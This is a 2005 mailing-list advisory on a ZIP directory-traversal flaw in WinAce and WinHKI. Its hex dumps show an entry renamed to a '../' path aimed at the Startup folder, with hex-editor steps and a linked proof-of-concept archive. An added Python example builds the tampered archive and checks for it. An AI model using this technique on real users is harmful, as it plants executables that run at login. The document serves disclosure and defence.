Network Security VulnWatch

[Full-Disclosure] WinAce & WinHKI - ZIP File Directory Traversal

Subject: [Full-Disclosure] WinAce & WinHKI - ZIP File Directory Traversal
Date: Thu, 06 Jan 2005 10:21:39 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinAce, WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ZIP File Directory Traversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@mail.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiver which supports the BH, CAB, HKI, JAR, LHA, TAR and GZ
compression formats.
WinAce is a file archiver which supports the CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA and LHA compression formats.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is the local file header of a normal ZIP archive. The entry is named
sp5.exe; the two-byte name-length field at offset 0x1A reads 0x0007 and the
name itself starts at offset 0x1E, directly after the 30-byte fixed header:

00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC  ...@D}:..I@C.|.

In the following dump we can see how easy it is to change the path to
anywhere we want, including the All Users Startup folder. Note that the
name-length field has been changed from 0x0007 to 0x0010 to cover the longer
name that now follows the header.
I just overwrote the original long file name with /../../sp5.exe

00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}

All we need to do is ZIP-compress (using WinZip, WinRAR or WinAce) a file with
a long name/path and then change the path stored inside the archive to
whatever we want using any hex editor such as Hex Workshop: just prepend the
traversal sequence to the filename and update the name-length field to match
(0x0007 became 0x0010 in the dump above). Keep in mind that the ZIP format
stores each entry name twice, once in the local file header and once in the
central directory at the end of the archive; an archiver that reads names
from the central directory will not see a name edited only in the local
header, so an extractor must check both copies before writing anything to
disk.
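To make the header manipulation above concrete, here is an added example, written for this page and not taken from the advisory or from WinAce or WinHKI. It builds a one-entry archive, rewrites the name and the name-length field of its local file header the way the advisory describes doing by hand, and then applies the two checks a safe extractor needs: reject any stored name that normalises to a location outside the extraction directory, and refuse entries whose local-header name differs from the central-directory copy. The payload bytes and the entry names are constructed stand-ins for the advisory's sp5.exe; the header layouts follow the PKWARE APPNOTE.

```python
"""Added example for this page (not code from the advisory or from WinAce/WinHKI):
build a one-entry ZIP, edit the name in its local file header the way the advisory
does with a hex editor, and apply the checks an extractor needs before writing."""
import io
import posixpath
import struct
import zipfile

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
# Local file header (30 bytes): sig, version, flags, method, time, date, crc,
# compressed size, uncompressed size, name length, extra length.
LOCAL_FMT = "<4sHHHHHIIIHH"
LOCAL_LEN = struct.calcsize(LOCAL_FMT)
# Central directory header (46 bytes) and end-of-central-directory record (22 bytes).
CENTRAL_FMT = "<4sHHHHHHIIIHHHHHII"
CENTRAL_LEN = struct.calcsize(CENTRAL_FMT)
EOCD_FMT = "<4sHHHHIIH"

PAYLOAD = b"MZ-not-really-an-exe\n"  # constructed stand-in for the advisory's sp5.exe
NORMAL_NAME = "sp5.exe"
EVIL_NAME = "vb/../../sp5.exe"       # the name visible in the advisory's second dump


def build_zip(name, data):
    """Constructed sample archive; zipfile stores the name exactly as given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def local_names(blob):
    """Entry names as stored in the local file headers, walked front to back."""
    names, off = [], 0
    while blob[off:off + 4] == LOCAL_SIG:
        f = struct.unpack_from(LOCAL_FMT, blob, off)
        csize, nlen, xlen = f[7], f[9], f[10]
        names.append(blob[off + LOCAL_LEN:off + LOCAL_LEN + nlen].decode("cp437"))
        off += LOCAL_LEN + nlen + xlen + csize
    return names


def central_names(blob):
    """Entry names as stored in the central directory, the second copy of each name.
    The directory is located from the EOCD record's position, not from the offset
    field, so it still parses after bytes have been inserted earlier in the file."""
    eocd_pos = blob.rfind(EOCD_SIG)
    count, cd_size = struct.unpack_from(EOCD_FMT, blob, eocd_pos)[4:6]
    off, names = eocd_pos - cd_size, []
    for _ in range(count):
        f = struct.unpack_from(CENTRAL_FMT, blob, off)
        if f[0] != CENTRAL_SIG:
            raise ValueError("corrupt central directory")
        nlen, xlen, clen = f[10], f[11], f[12]
        names.append(blob[off + CENTRAL_LEN:off + CENTRAL_LEN + nlen].decode("cp437"))
        off += CENTRAL_LEN + nlen + xlen + clen
    return names


def rename_local_entry(blob, new_name):
    """Do in code what the advisory does in a hex editor: overwrite the name in the
    first local file header and fix the name-length field to match (0x0007 -> 0x0010
    in the advisory's dumps). Nothing else is touched, so the central directory keeps
    the original name, just as after a manual edit of the local header alone."""
    f = list(struct.unpack_from(LOCAL_FMT, blob, 0))
    if f[0] != LOCAL_SIG:
        raise ValueError("not a ZIP local file header")
    old_nlen, raw = f[9], new_name.encode("cp437")
    f[9] = len(raw)
    return struct.pack(LOCAL_FMT, *f) + raw + blob[LOCAL_LEN + old_nlen:]


def is_unsafe_name(name):
    """True if a stored name could land outside the extraction directory: empty,
    absolute, drive-letter or backslash paths, or any '..' left after normalising."""
    if not name or name.startswith(("/", "\\")) or "\\" in name or ":" in name:
        return True
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")


def unsafe_entries(blob):
    """Entries an extractor must refuse: a traversal in either copy of the name, or
    local and central copies that disagree (a sign that one of them was edited)."""
    local, central = local_names(blob), central_names(blob)
    bad = {n for n in local + central if is_unsafe_name(n)}
    bad.update(l for l, c in zip(local, central) if l != c)
    return sorted(bad)


if __name__ == "__main__":
    clean = build_zip(NORMAL_NAME, PAYLOAD)
    evil = rename_local_entry(clean, EVIL_NAME)
    for label, blob in (("clean", clean), ("edited", evil)):
        print(label, local_names(blob), central_names(blob), unsafe_entries(blob))
```

Run stand-alone, the edited archive reports vb/../../sp5.exe in its local header while the central directory still says sp5.exe. An extractor that trusts the local header name and joins it to the destination directory writes the file two levels up, which is the behaviour the advisory attributes to WinAce and WinHKI; an extractor that reads the central directory never sees the edit. Archivers differ in which copy they trust, so a robust extractor normalises the name, rejects anything that escapes the target directory, and treats a disagreement between the two copies as tampering rather than picking one.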

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
